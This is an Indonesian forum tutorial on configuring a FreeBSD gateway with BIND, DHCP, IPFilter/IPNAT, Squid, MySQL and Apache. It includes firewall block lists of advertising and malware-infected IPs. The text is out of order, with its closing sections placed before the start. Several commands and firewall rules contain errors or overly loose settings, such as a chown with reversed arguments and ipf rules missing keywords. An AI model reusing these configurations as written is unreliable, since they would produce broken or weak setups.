#dont-block-yahoo: BLOK 66.218.71.80/24 group 42000 #w1.scd.yahoo.com
#end-new compilation

#old compilation
BLOK 12.90.179.10/16 group 42000
BLOK 63.215.149.25/24 group 42000 #porno
BLOK 192.150.10.120/16 group 42000 #adobe spyier!!!
#...long-list...
BLOK 216.218.220.42/24 group 42000 #servergold.com - porn
#beware! Namezeroes are always peeking our nbns port!
BLOK 216.34.13.245 port != 80 group 42000

#end-old-compilation

3.2.5.2 Daftar alamat IP berbahaya
Berikut ini daftar alamat IP berbahaya karena menyebarkan virus nimda atau code-red hingga tulisan ini dibuat (mungkin IP anda tercantum disini, selamat! :)).
penggunaannya dalam ipf.rules misalnya:

block return-rst in log first quick on rl1 proto tcp from 202.10.35.227 to any Group 23456 #Nimda

4.47.218.144#code_red

#internal INDOSAT NET-10.X.X.X
10.1.8.108#nimda
10.6.2.4#nimda
#...long-list...
10.6.18.68#nimda
#end: internal INDOSAT NET-10.X.X.X

24.73.201.22#code_red
24.80.172.120#code_red
#...long-list...
24.196.16.168#code_red
219.8.104.74#nimda
</pre>

4.Lain-lain
Dalam bagian ini diasumsikan bahwa kita akan menginstal program dari source kodenya, yang diekstrak ke direktori /usr/local/src, mis.: tar -xpvzf apache.tgz -C /usr/local/src.
bagian version number, jika ada, sebaiknya dihilangkan, mis.: mv apache-1.1.23pl8 apache

4.1. Squid
/configure --enable-ipf-transparent \

#parameter lain yang perlu:
--prefix=/usr/local \
--bindir=\${prefix}/sbin \
--libexecdir=\${prefix}/libexec \
--sysconfdir=\${prefix}/etc/squid \

#parameter lain yang mungkin perlu:
--enable-storeio="ufs diskd null" \
--enable-removal-policies="lru heap" \

#parameter tambahan:
--localstatedir=\${prefix}/squid \
--host=i686 \
--disable-ident-lookups \
--disable-wccp \
--enable-kill-parent-hack \
--enable-time-hack \
--with-pthreads

make all; make install

Dengan parameter diatas kita akan memperoleh konfigurasi squid yang mirip seperti jika kita menginstalnya melalui package.
Kemudian file logs dan cache di direktori /usr/local/etc/squid di chown nobody:nogroup (atau sesuai dengan usernya jika telah dibuat user untuk squid, seperti user mysql dibawah).
Setelah itu kita buat intial cache directory dengan menjalankan: squid -z. Default cache size adalah 100MB.

==Konfigurasi MySQL, PHP dan Apache==

==MySQL==

/configure \
--localstatedir=/var/db/mysql \
--with-unix-socket-path=/var/run/mysql.sock \
--host=i686 \
--enable-assembler \
--with-libwrap \
--with-berkeley-db \
--with-named-z-lib \
--with-mysqld-ldflags=-all-static \
--with-client-ldflags=-all-static \
--without-debug \
--without-bench \
--without-docs \
--without-readline

make; make install

Tambahkan user mysql dengan ID misalkan = 3036

pw add group mysql -g 3036
pw add user mysql -u mysql -g mysql -wno -s /sbin/nologint -d /var/db/mysql -c "MySQL"

Direktori localstatedir (/var/db/mysql) diatas, *harus* read/write by user mysql:
chown -R /var/db/mysql mysql:mysql

==PHP==
Sebelumnya kita harus cd ke source apache dulu: cd /usr/local/src/apache, lalu jalankan ./configure (plain).

Kemudian baru cd ke source php: cd /usr/local/src/php dan mengkonfigurasi php sesuai preferensi kita.

/configure \
--build=i686 \
--prefix=/usr/local \
--with-mysql=/usr/local \
--with-apache=../apache \
--with-pcre-regex=/usr/local \
--with-mcrypt \
--with-zlib \
--with-ftp \
--enable-track-vars \
--enable-ctype

make; make install

==Apache==

/configure \
--enable-module=most \
--enable-shared=max \
--server-uid=www \
--server-gid=www \
--activate-module=src/modules/php4/libphp4.a

make; make install

==Penutup==

Sesuai dengan tujuan utama tulisan ini, beberapa sub-sistem mungkin hanya sedikit atau sama sekali tidak dibahas, bagian-bagian tersebut dianggap sesuai dengan instalasi default.
Terakhir, penulis dengan senang hati akan menerima kritik dan saran dari pembaca semua, semoga ada manfaatnya.

aa, aa.delphi@yahoo.com

URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global

2008-07-27T03:56:11Z

Aa: /* File root.box: */

Sumber: aa, aa.delphi@yahoo.com
URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Dalam tulisan ini akan dibahas (mudah-mudahan) secara cukup detail, bagaimana mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global, baik dinamik maupun statik (dial-up PPP, Cable-Modem atau DSL).

Model network seperti ini merupakan model yang sangat umum digunakan oleh warnet serta perusahaan kecil yang berniat untuk memberikan akses internet yang murah meriah bagi para karyawannya.

Teknik yang akan dibahas ini merupakan salah satu (mungkin merupakan yang terbaik) dibandingkan dengan alternatif lainnya seperti menggunakan hardware tertentu (modem dengan kapabilitas internet sharing), kelemahan: jumlah host sangat terbatas, antara 2 - 8, serta fleksibilitasnya sangat rendah, hampir tanpa menggunakan pengamanan dari intruder.

Pilihan lainnya adalah dengan sistem operasi MS Windows (yang sudah sangat familiar), fleksibilitas cukup, namun dengan tingkat pengamanan yang relatif rendah.

Pilihan OS lainnya seperti Linux, OpenBSD atau Solaris bisa juga diperhitungkan, namun overall performance, kombinasi FreeBSD dan IPF adalah yang terbaik dinilai dari segi keamanan/security, performansi, dukungan resources (software, kompatibilitas, utilitas dan dokumentasi) yang tersedia, serta biaya yang dibutuhkan. Dengan FreeBSD mesin 386 tua milik kita disulap menjadi sebuah server yang powerful, robust dan tahan banting.

cat: IPF (IPFilter) adalah paket firewal native dari OpenBSD, sistem operasi yang selama ini dinilai sebagai salah satu OS yang dianggap paling secure.

==Topologi Network==
<pre>
===============================================

_____
| ISP |
|_____|
DNS: 202.155.0.10, 202.155.0.20
|
| 10.20.30.40
___|___
|FreeBSD|...........
|_______| Virtual-Host 192.168.2.1
my.domain.box| Gateway
192.168.1.1 | Firewall - IPF/IPNAT
| DNS Server - BIND
Network: | HTTP Server - Apache
192.168.1.0 | Proxy Server - Squid
255.255.255.0| SQL Server - MySQL
|
|
_________|____...___
| | | |
__|__ __|__ __|__ __|__
Host1 Host2 Host3 HostN
</pre>

Ada 3 pokok bahasan utama dalam kasus ini.
# DNS
# DHCP Server
# IPF/IPNAT

lain-lain: Apache, MySQL dan Squid tidak akan dibahas panjang karena tidak esensial dalam konteks ini.

==DNS==

Untuk mengaktifkan name server jalankan /stand/sysinstal pilih menu Configure, kemudian Startup, lalu aktifkan (enable) named. Jika anda ingin menjalankan named dalam sandbox, isi named flags dengan argumen seperti dalam uraian butir 1.3.

Cara lainnya adalah dengan mengedit langsung /etc/rc.conf, ganti atau tambahkan entri di

/etc/rc.conf:
named_enable="yes"
named_flags="" #lihat uraian selanjutnya

==Cache-Only DNS Server==

Konfigurasi DNS yang paling sederhana, yang kemungkinan besar akan berjalan lancar adalah menggunakan konfigurasi jenis cache-only DNS Server, artinya server DNS kita TIDAK memiliki otoritas atas satu zone-pun juga kecuali localhost dan loopback network 127.

Kekurangan dari model DNS Server seperti ini adalah, tentu saja, host-host dalam network kita tidak dapat saling mengenal. Hal ini bisa kita uji dengan perintah ping dari satu host terhadap host lainnya.

cat.: Dalam terminologi BIND, zone adalah suatu area network dimana sebuah server DNS memiliki otoritas atas pengaturan nama atas host-host yang ada di dalamnya.

Untuk network yang relatif sederhana seperti pada small-office atau di organisasi kecil, suatu zone umumnya hanya berupa satu domain, sementara di organisasi yang cukup besar, seperti di lingkungan kampus dan terutama di sebuah ISP, biasanya sebuah server DNS akan menangani suatu zone yang terdiri atas lebih dari satu domain.

==Konfigurasi dalam named.conf==
<pre>
options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP kita misalnya:
202.155.0.10;
202.155.0.20;
};
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};

zone "." {
type hint;
file "root.servers";
};
</pre>

==File-file database==

==File localhost.rev:==

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.
1 IN PTR localhost.domain.box.

cat.: Untuk menghindari salah ketik, sebaiknya kita cukup menjalankan perintah: sh make-localhost di direktori /etc/namedb.

==File root.servers:==
File ini tidak perlu dirubah, biarkan saja sesuai defaultnya.

==Internal-Root DNS Server==
Seperti dapat dilihat pada gambar diatas, network kita termasuk kedalam network kelas C, dengan alamat 192.168.1.0 dan netmask 255.255.255.0. IP address network card pertama (if_1) ditetapkan oleh ISP, sementara if_2 dapat kita tentukan sendiri.

Selanjutnya kita dapat menetapkan hal-hal sebagai berikut:

Zone/domain: domain.box
Reverse-Network: 1.168.192.in-addr.arpa
Server address: 192.168.1.1
Server name: my.domain.box

==Konfigurasi dalam named.conf:==

==Konfigurasi awal (Cache-Only DNS Server):==
<pre>
options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP:
202.155.0.10;
202.155.0.20;
};
version "19.09.1969";
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};
</pre>

==Konfigurasi named.conf yang perlu ditambahkan (atau dirubah):==
<pre>
forward;

zone "domain.box" {
type master;
file "box/domain.db";
};

zone "1.168.192.in-addr.arpa" {
type master;
file "box/domain.rev";
};

zone "." {
type hint;
//file "root.servers";
file "box/root.box";
};
</pre>

==File-file database==

==File localhost.rev:==

Tidak perlu ada perubahan dalam file ini, sama dengan butir 1.1.2.1 diatas.

==File domain.db:==

Berisi daftar translasi name to address untuk seluruh host yang ada di domain domain.box, hati-hati character comment di sini adalah semi-colon (;) bukan hash (#).
<pre>
@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

localhost IN A 127.0.0.1

my IN A 192.168.1.1
host1 in cname my
host2 IN A 192.168.1.2
host3 IN A 192.168.1.3
..
..
..
host254 IN A 192.168.1.254
</pre>

cat.: Perhatikan bahwa dalam database ini kita perlu menambahkan entri untuk localhost, sehingga setiap rujukan atas localhost, dari manapun juga, akan diarahkan ke loopback masing-masing.

==File domain.rev:==
Kebalikan dari domain.db, merupakan reverse address to name atas domain.box untuk network 192.168.1.0/24
<pre>
@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

1 IN PTR my
2 IN PTR host1
3 IN PTR host2
..
254 IN PTR host254
</pre>

cat.: Perhatikan bahwa tidak bisa dilakukan reverse untuk alias atau CNAME (canonical-name). Tidak diperbolehkan terdapat *dua entri yang sama* untuk *satu nomor address*, atau dengan kata lain, satu nomor adress tidak boleh merujuk kepada dua nama yang berbeda. Sebaliknya bisa saja terdapat dua nomor address untuk satu nama, misalnya jika kita memiliki dua atau lebih network card dalam satu host yang masing-masing memiliki IP sendiri.

==File root.box:==

File ini merupakan modifikasi dari file root.servers, yaitu dengan menambahkan RR (Resource Record) yang menyatakan bahwa server kita memiliki otoritas atas root domain.
<pre>
@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

;domain "domain.box" didelegasikan langsung dari root
domain.box. 9999999 IN NS my.domain.box.

;juga reverse dari class-C network
1.168.192.in-addr.arpa 9999999 IN NS my.domain.box.

;glue records
my.domain.box. IN A 192.168.1.1

;daftar root server selanjutnya sama dengan default di file root.servers
..
</pre>

==DNS Server in the sand-box==

Konfigurasi server DNS ini terutama ditujukan untuk memperketat sekuriti sistem network, prinsipnya sederhana, yaitu menjalankan servis DNS (named) oleh non-privilege user, untuk ini biasanya sengaja dibuat satu user khusus, tanpa fasilitas login.
Sebenarnya untuk model network kita yang sederhana, ancaman sekuriti yang ada mungkin tidak akan terlalu serius. Konfigurasi ini bisa jadi sebagai opsi yang bisa diambil ataupun tidak.

1.3.1
Buat user baru untuk servis DNS, misalnya dengan nama: bind.
User group: bind (default)
User home: /usr/local/bind
shell: no, nologin atau nonexistent

1.3.2
ganti atau tambahkan entri di /etc/rc.conf:
named_flags="-u bind -g bind -w /usr/local/bind -c named.conf -t /usr/local/bind"

Penjelasan atas argumen:
-u dan -g: user serta group yang menjalankan servis DNS adalah "bind".
-w dan -c: direktori kerja dan nama file konfigurasi yang dipakai.
-t: setelah melakukan inisialisasi, servis DNS menjadikan /usr/local/bind
sebagai root direktorinya (chroot).

Dengan penggantian user, group dan chroot, servis DNS ini tidak lagi memiliki akses tak-terbatas atas resources, sehingga perlu dilakukan lagi beberapa penyesuaian:

1.3.2.1

Servis named dan ndc biasanya menampilkan prosess-id-nya dibawah sub-direktori /var/run, karena root-directory-nya berubah, maka kita harus membuat secara manual subdirektori /var/run dibawah /usr/local/bind, jangan lupa ownershipnya harus disesuaikan menjadi bind:bind

1.3.2.1

Jika penyesuaian sub-direktori diatas tidak dilakukan maka setidaknya harus dibuat penyesuaian dalam option named.conf:
[pre]
options {
...

directory "/"; //(atau mudahnya hapus saja option ini)
pid-file "named.pid" //named.pid berada di direktori root yang baru

...
}
[/pre]

1.3.3

Pindahkan atau salin /etc/namedb ke /usr/local/bind.

cat.: Perhatikan ownership dari /usr/local/bind, jika kita menyalinnya dengan tool atau file-manager seperti midnight- commander, biasanya ownership akan berubah dari bind ke root (atau privileged user pada saat itu), sehingga harus dikembalikan lagi dengan chown -r bind:bind /usr/local/bind.

Penyesuaian ownership ini juga berlaku untuk direktori baru dibawahnya yang kelak digunakan untuk file-file yang meminta akses-tulis seperti log, dump, stat, pid, dsb.

1.3.4
[pre]
Hentikan proses named yang saat itu berlangsung (dengan kill, killall atau top), lalu aktifkan kembali named (dengan argumen seperti named_flags diatas), atau reboot server.
[/pre]

2. DHCP Server

2.1. Instalasi dan Setup

Dengan /stand/sysinstall, install package isc-dhcpd.
Instalasi ini hanya sekedar mengekstrak program dan dokumentasi dhcpd, kita *harus* membuat sebuah file yaitu /var/db/dhcpd.lease secara manual: touch /var/db/dhcpd.leases.
Edit file /usr/local/etc/dhcpd.conf dengan editor kesayangan anda, fi-ay :), dan buat alokasi dinamis IP addresses untuk network 192.168.1.0/24 misalnya:

#jangan lupa menggunakan fasilitas syslog
#dalam syslog.conf tambahkan entry sbb:
# local7* /var/log/dhcpd.log #awas: pake TAB, jangan pake spasi!

log-facility local7;
authoritative;
ddns-update-style ad-hoc;

option domain-name "domain.box";

subnet 192.168.1.0 netmask 255.255.255.0 {
option netbios-name-servers 192.168.1.3; #server NT kita
option domain-name-servers 192.168.1.1;
option routers 192.168.1.1;
pool { range 192.168.1.10 192.168.1.190; }
}

2.2. Menjalankan dhcpd
DHCP server sebaiknya dijalankan pada saat boot-up dengan membuat file startup di /usr/local/etc/rc.d
Untuk menjalankan secara manual ketikan perintah: dhcpd if_2 (if_2 adalah interface yang terhubung dengan network lokal)

3.IPF/IPNAT

'Official' firewall dari FreeBSD adalah ipfw/natd, kelebihan ipfw terutama adalah kemampuan untuk mengatur kuota bandwith, sementara kelebihan ipf/ipnat yang paling utama adalah performansi. Juga menurut authornya, ipf benar-benar melakukan kontrol terhadap TCP/IP state, tidak cuma artifisial (sekedar mengecek kombinasi flags tertentu seperti SYN/ACK) seperti yang dilakukan dalam paket firewall lainnya.

Dalam bahasan kali ini, kita akan menggunakan IPFilter/IPNAT.

3.1. Kompilasi kernel

Untuk memasang firewall kita harus mengkompile ulang kernel (selanjutnya kita bisa mencopot-pasang lagi lewat loadable kernel module).

3.1.1 Konfigurasi kernel

cd /usr/src/sys/i386/conf
option tambahan kernel kita dari GENERIC adalah sbb:

#--- start kernel options ---
#hapus semua options cpu kecuali model tertinggi sesuai cpu anda
#cpu I386_CPU
#cpu I486_CPU
#cpu I586_CPU
cpu I686_CPU
maxusers 32

#kostumisasi kernel (lihat juga catatan tambahan)
ident AA
makeoptions KERNEL=AA

#jangan lupa mengganti entri di /boot atau /etc/defaults/rc.conf
#userconfig_script_load="YES"
#kernel="/AA"
#verbose_loading="YES"
#autoboot_delay="3"
#bootfile="AA,aa,kernel"

#kita tidak memakai 386SX kebawah, jadi emulasi mathco bisa dihapus saja
#options GPL_MATH_EMULATE #Support for x87 emulation

#console menggunakan teks mode 90x60
device vga0 at isa?
options VGA_WIDTH90 #90 baris VGA
options VESA

#jangan lupa nanti tambahkan font dan screenflags di /etc/rc.conf sbb:
#font8x14="cp437-8x14"
#font8x16="cp437-8x16"
#font8x8="cp437-8x8"
#allscreens_flags="VGA_90x60"

#hapus splash screen/screen saver.
#pseudo-device splash

#selain UFS, dalam box kita terdapat juga NTFS dan EXT2FS
options NTFS #NT
options EXT2FS #Linux
options NFS_NOSERVER #Membuang kode NFS

#options UNION #UFS bisa digabung
#options NULLFS #null
#options UMAPFS #UID Map FileSystem
#options KERNFS #kernel
#options SMBFS #SMB/File Sharing ala Windows
#options PROCFS #memetakan Process ID

# Tambahkan flags 0xb0ff (maks. drive blok transfer) untuk hard-disk
# untuk sepasang hard-disk per-interface flagsnya adalah 0xb0ffb0ff
device ata0 at isa? port IO_WD1 irq 14 flags 0xb0ffb0ff
device ata1 at isa? port IO_WD2 irq 15 flags 0xb0ffb0ff

options SOFTUPDATES #penting untuk meningkatkan performansi
options ATA_STATIC_ID #Static device numbering

#hapus saja tape-drive.
#device atapist # ATAPI tape drives

# jika menggunakan APM, sebaiknya tidak.
#device apm0 at nexus? disable flags 0x20 # Advanced Power Management

# PCCARD (PCMCIA) support, buang saja
#device card
#device pcic0 at isa? irq 0 port 0x3e0 iomem 0xd0000
#device pcic1 at isa? irq 0 port 0x3e2 iomem 0xd4000 disable

#Buang saja serial 2 dan 3
#device sio2 at isa? disable port IO_COM3 irq 5
#device sio3 at isa? disable port IO_COM4 irq 9

#Buang juga koneksi lewat Parallel port
#device plip # TCP/IP over parallel
#device ppi # Parallel port interface device
#device vpo # Requires scbus and da

#Buang semua entri ethernet yang tidak ada
#saya cuma punya 3Com 3C509, 3C905 dan realtek
device ep # 3Com 3C509 (10 MBps)
device xl # 3Com 3c905 (10/100)
device rl # RealTek 8129/8139 (10/100)
#device de # Realtek lama (10)

#Banyak software yang tergantung kepada bpf
#(discouraged), tapi sebaiknya tetap dipasang
pseudo-device bpf #Berkeley packet filter

#Buang semua options USB yang hardwarenya tidak ada
device uhci # UHCI PCI->USB interface
device ohci # OHCI PCI->USB interface
device usb # USB Bus (required)
device ugen # Generic
#device uhid # "Human Interface Devices"
#device ukbd # Keyboard
#device ulpt # Printer
#device umass # Disks/Mass storage - Requires scbus and da
#device ums # Mouse
#device uscanner # Scanners
# USB Ethernet, requires mii
#device aue # ADMtek USB ethernet
#device cue # CATC USB ethernet
#device kue # Kawasaki LSI USB ethernet

#Soundcard (generik)
device pcm

#jangan lupa nanti untuk membuat entri2 sound
#(audio, mixer, sequencer dll) di /dev:
#cd /dev
#./MAKEDEV snd

#Intel PIIX4 Power Management Unit
#device smbus
#device intpm

#Berhubung SCSI card saya sudah sangat kuno, akhirnya saya cabut :)
#Jika tidak memiliki SCSI, semua options yang behubungan dengan skasi
#bisa dibuang

#options SCSI_DELAY=8000 #Delay (in ms) before probing SCSI
# SCSI Controllers
#...
# SCSI peripherals
#...

#Jika menggunakan firewall bawaan FreeBSD:
#options IPFIREWALL
#options IPDIVERT
#options IPFIREWALL_VERBOSE
#options IPFIREWALL_VERBOSE_LIMIT=32
#options IPFIREWALL_DEFAULT_TO_ACCEPT

#Jika anda memasang bandwith quota tambahkan entri dibawah ini
#options IPDIVERT #digunakan juga oleh ipfw/natd
#options DUMMYNET
#options QUOTA

#Konfigurasi ipfilter/ipnat ini yang kita pakai
#cat. jika menggunakan IPFilter TIDAK PERLU ditambahkan
#lagi options IPDIVERT seperti yang terdapat dalam
#beberapa dokumentasi online

options IPFILTER
options IPFILTER_LOG
options IPFILTER_DEFAULT_BLOCK

#untuk memperketat firewall bisa ditambahkan options dibawah ini:
options IPSTEALTH
options TCP_DROP_SYNFIN
options TCP_RESTRICT_RST

options MROUTING
options RANDOM_IP_ID

#beberapa options lainnya untuk memacu performa
options NBUF=4096
options NMBCLUSTERS=8192

#catatan tambahan:

#Jika anda ingin mengubah release, copyright et-al., lakukan perubahan ini
#di /usr/src/sys/conf/newvers.sh

#dari original
#TYPE="FreeBSD"
#REVISION="4.3"
#BRANCH="RELEASE"
#RELEASE=4.3-RELEASE
#VERSION="${TYPE} ${RELEASE}"
if [ X"$COPYRIGHT" = X ]; then
COPYRIGHT="/*
* Copyright (c) $year
* FreeBSD Inc. All rights reserved.
*
*/"
fi

#menjadi violated
TYPE="mbakNunix"
REVISION="1.31"
BRANCH="BURIX"
RELEASE=1.31-BURIX
VERSION="${TYPE} ${RELEASE}"
COPYRIGHT="
/*** aa, aa.delphi@yahoo.com, 1995-$year ***/
"

2.1.2 Kompilasi

Akhirnya kita kompile kernel sbb:

su (kita harus root)
cd /usr/src/sys/i386/conf
chflags noschg AA (jika sekuriti diperketat, biasanya kernel diberi flag schg)

/usr/sbin/config -r AA && \
cd ../../compile/$1 && \
(make depend) 2>~/err1 && \
make 2>~/err2 && \
(make install) 2>~/err3

semua error message masing-masing akan dicatat di /root, file: err1, err2 dan err3

3.2. Mengkonfigurasi IPF/IPNAT

3.2.1. Konfigurasi rc.conf
Konfigurasi umum seperti biasa dilakukan di rc.conf

3.2.2. Konfigurasi syslog.conf

3.2.3. Tuning sysctl.conf
net.inet.ip.forwarding=1
net.inet.ip.fastforwarding=1

3.2.4. ipnat.rules
Rules untuk IPNAT dibahas lebih dulu karena relatif jauh lebih sederhana daripada rules untuk IPF

Catatan:
map artinya: remap SOURCE packet's IP address
rdr artinya: redirect DESTINATION of packet's IP address

Tambahkan baris berikut untuk mengemap :) port ftp

map rl1 192.168.1.0/24 -> 0/32 proxy port 21 ftp/tcp
map rl1 192.168.1.0/24 -> 0/32 portmap tcp/udp 49152:65535 #nomor port bebas antara 0-65535
map rl1 192.168.1.0/24 -> 0/32

HTTP request di redirect ke server

rdr rl1 0/32 port 80 -> 192.168.1.1 port 80 tcp

#jika perlu permintaan http dari lokal bisa di redirect ke SQUID port 3128
#rdr rl0 0.0.0.0/0 port 80 -> 192.168.1.1 port 3128 tcp

3.2.5. ipf.rules

Default konfigurasi adalah block in all, block out all artinya dengan konfigurasi seperti ini server kita benar-benar jadi mahluk egois, tidak mau melihat kanan-kiri sedikitpun :)

konfigurasi paling sederhana yang bisa berjalan adalah:

pass in all
pass out all

Artinya sama saja dengan tidak memasang firewall.

jika server kita hanya digunakan untuk mengakses internet keluar (outward-only), cukup kita isi firewall rules dengan satu baris:

pass out quick all keep state keep frags

untuk ipf ver 4.32 (FreeBSD 4.5+) rule "keep" tidak bisa diterapkan kepada paket selain tcp/udp/icmp, jadi rule diatas dibagi menjadi:

pass out quick proto tcp/udp all keep state keep frags
pass out quick proto icmp all keep state keep frags
pass out quick all

Dengan menggunakan keep state, kita tinggal membuka port yang kita perlukan saja, lalu-lintas koneksi yang terkait dengan servis/port tsb selanjutnya ditangani oleh ipf, misalnya:

block in quick all
pass out quick proto icmp all icmp-type echo keep state

meski diatas terdapat block, icmp-reply akan tetap bisa masuk masuk karena memang diminta oleh icmp-echo.
pada protokol tcp/udp lainnya, pembukaan gerbang masuk ini mencakup juga control messages berupa icmp atau bahkan segmen IP dengan nomor port lainnya yang berbeda, yang masih terkait dalam koneksi tersebut.

catatan tambahan:
Sebaiknya keep-state jangan terlalu di-obral supaya tidak menghabiskan resources atau bahkan membuka celah security berupa Denial of Service (DoS) Attack, lebih tepat kiranya jika hanya protokol TCP dengan SYN Flag serta port-port tertentu saja yang dipasangi keep-state seperti FTP (21), SSH (22), SMTP (25), DNS (53), DHCP (67/58), serta ICMP echo.
Jika hanya permintaan koneksi (ditandai dengan SYN flag) dari servis/port tertentu yang dibuka, jalur masuk semua ditutup (block in all), port FTP mau tidak mau harus diberi keep state karena setelah koneksi terjadi dia akan membuka port/jalur baru (UDP port 20, atau TCP dengan unassigned [high number] port) untuk komunikasi data.

pass out quick proto tcp flags S keep state
pass out quick proto udp port = 53 keep state
pass out quick proto icmp all icmp-type echo keep state
pass out quick all

Karena pembahasan ipf ini cukup panjang, maka akan kita singkat saja dengan menggunakan rules yang berguna secara umum

[pre]
#UMUM
pass in quick on lo0
pass out quick on lo0

#NBNS
block return-rst in quick proto tcp all port 136 >< 140
block return-icmp-as-dest(port-unr) in quick all port 136 >< 140

#============================================================
#if_1 adalah eksternal interface (yang terhubung ke internet)
#============================================================

#INWARD
#------
block in quick on if_1 all head 10000
#Start group 10000

block in quick all with opt lsrr group 10000 #block loose src routing
block in quick all with opt ssrr group 10000 #block strict src routing
block in quick proto tcp all with frags group 10000

#block no. ip address yang diketahui berbahaya, bervirus dsb.
#block in quick proto tcp/udp from Danger_IPs group 10000
#(lihat daftar 3.2.5.2)

pass in quick proto tcp all port = http flags S keep state group 10000 #jika kita pasang web server

block in quick proto icmp all head 11000 group 10000 #blok icmp yang tidak perlu
#Start group 11000
#pass in log first quick proto icmp all icmp-type echo group 11000
pass in quick proto icmp all icmp-type echorep group 11000
pass in quick proto icmp all icmp-type unreach group 11000
pass in quick proto icmp all icmp-type redir group 11000
pass in quick proto icmp all icmp-type timex group 11000
block in return-icmp-as-dest(host-unr) in quick all group 11000
#End group 11000

#__________________________________________________
block return-rst in quick proto tcp all group 10000
block return-icmp-as-dest(port-unr) in quick all group 10000

#End group 10000

#OUTWARD bebas
#-------------
block out quick on if_1 all head 20000
pass out quick proto tcp/udp all keep state keep frags group 20000
pass out quick proto icmp all keep state keep frags 20000
pass out quick all 20000

#===========================================================
#if_2 adalah internal interface (yang terhubung ke intranet)
#===========================================================

#INWARD
#------
block in quick on if_2 all head 30000
#Start group 30000

#Test User, tahan uninitialized host
block in quick from !192.168.1.1/24 to any head 31000 group 30000
#Start group 31000

#Unknown User, harus daftar dhcp dulu
pass in log first quick proto tcp/udp from any port = 68 to any port = 67 group 31000
block return-icmp-as-dest(host-unk) in log first quick all group 31000 #Unknown

#HTTP
#Tahan dulu http untuk diinterogasi, mau kemanakah tujuannya.
block in log first quick all port = http head 32000 group 31000
#Start group 32000

#HTTP block template: popups, junker, spammer etc. dilarang!
block return-rst in log first quick proto tcp from any to 64.38.238.0/18 group 32000 #ADS!
block return-rst in log first quick proto tcp from any to 66.28.153.36/24 group 32000 #porn&spy!
#...dst (lihat daftar 3.2.5.1 yang berisi IP popups/spyies)

#aman...
pass in log first quick proto tcp all flags S keep state keep frags group 32000

#HTTP-TCP only, yg lainnya di-blok by default!
block return-rst in quick proto tcp all group 32000

#End group 32000
#End group 31000

#Pada tahap ini user telah dikenal (dari 192.168.1.1/24) dan dengan permintaan port selain http
#atau user dari 192.168.1.1/24 dengan port http namun protokolnya selain tcp

#Tahan permintaan DNS keluar
block return-icmp-as-dest(filter-prohib) in quick proto tcp/udp from any to 202.155.0.10/24 port = domain group 30000

pass in log first quick proto tcp/udp all port < 1024 keep state group 30000 #regular ports
pass in log first quick proto tcp/udp all port = 3130 keep state group 30000 #SQUID
pass in log first quick proto tcp/udp all port = 3306 keep state group 30000 #MySQL

#__________________________________________________
#lainnya secara default di-blok
block return-rst in quick proto tcp all group 30000
block return-icmp-as-dest(port-unr) in quick all group 30000

#End group 30000

#OUTWARD bebas
#-------------
block out quick on if_2 all head 40000
pass out quick proto tcp/udp all keep state keep frags 40000
pass out quick proto icmp all keep state keep frags 40000
pass out quick all 40000
[/pre]

3.2.5.1 Daftar alamat IP popup
Berikut ini daftar ip popup dan advertising banner, spy, spammer dll yang selain menyebalkan juga kadang berbahaya.
cat.: ganti kata "BLOK" dengan: "block return-rst in log first quick proto tcp from any to", juga nomor group disesuaikan dengan konfigurasi

#HTTP block template

#Hall Of Fames - top of sh*ts!-
BLOK 64.38.238.0/18 group 42000 #popups.ini
BLOK 64.38.223.51/24 group 42000 #!!!trafficcashgold.com
BLOK 64.38.226.6/24 group 42000 #maxcash.cavecreek.net
BLOK 64.38.247.60/24 group 42000 #count1-old.paycounter.com[]
BLOK 205.180.85.40/24 group 42000 #popups.ini TOP!!! media.fastclick.net
BLOK 202.180.8.129/24 group 42000 #ns1.servercyber.com
BLOK 207.68.178.251/24 group 42000 #ads.msn.com
BLOK 207.68.185.58/24 group 42000 #autosearch.msn.com
BLOK 207.68.171.254/24 group 42000 #adobe-spy
BLOK 207.68.172.253/24 group 42000 #adobe-spy
BLOK 207.68.173.254/22 group 42000 #adobe-spy
BLOK 209.225.0.6/24 group 42000 #servedby.advertising.com
BLOK 209.225.4.72/24 group 42000 #advertising.com

#telkom!dont-block: BLOK 203.130.252.36/24 group 42000 #mencurigakan sih

#dangerous!
BLOK 66.28.38.3/24 group 42000 #
BLOK 209.50.252.100/24 group 42000 #4bigcash.com
BLOK 209.5.187.10/24 group 42000 #freepopups.com
#BLOK 209.5.187.16/24 group 42000 #adpowerzone.com
#BLOK 213.249.1.67/24 group 42000 #d67.kif2.nas.panafonet.gr
#End dangerous

#from popups.ini
BLOK 12.42.235.3/24 group 42000 #popups.ini
#...long-list...
BLOK 216.95.228.15/24 group 42000 #popups.ini
#end-from popups.ini

#new compilation
#BLOK 66.206.15.201/24 group 42000 #indo-porn, gapapa-lah
BLOK 63.167.204.56/24 group 42000 #7adpower.com
#...long-list...
BLOK 128.11.42.61/24 group 42000 #burstnet.com
#dont-block-yahoo: BLOK 66.218.71.80/24 group 42000 #w1.scd.yahoo.com
#end-new compilation

#old compilation
BLOK 12.90.179.10/16 group 42000
BLOK 63.215.149.25/24 group 42000 #porno
BLOK 192.150.10.120/16 group 42000 #adobe spyier!!!
#...long-list...
BLOK 216.218.220.42/24 group 42000 #servergold.com - porn
#beware! Namezeroes are always peeking our nbns port!
BLOK 216.34.13.245 port != 80 group 42000

#end-old-compilation

3.2.5.2 Daftar alamat IP berbahaya
Berikut ini daftar alamat IP berbahaya karena menyebarkan virus nimda atau code-red hingga tulisan ini dibuat (mungkin IP anda tercantum disini, selamat! :)).
penggunaannya dalam ipf.rules misalnya:

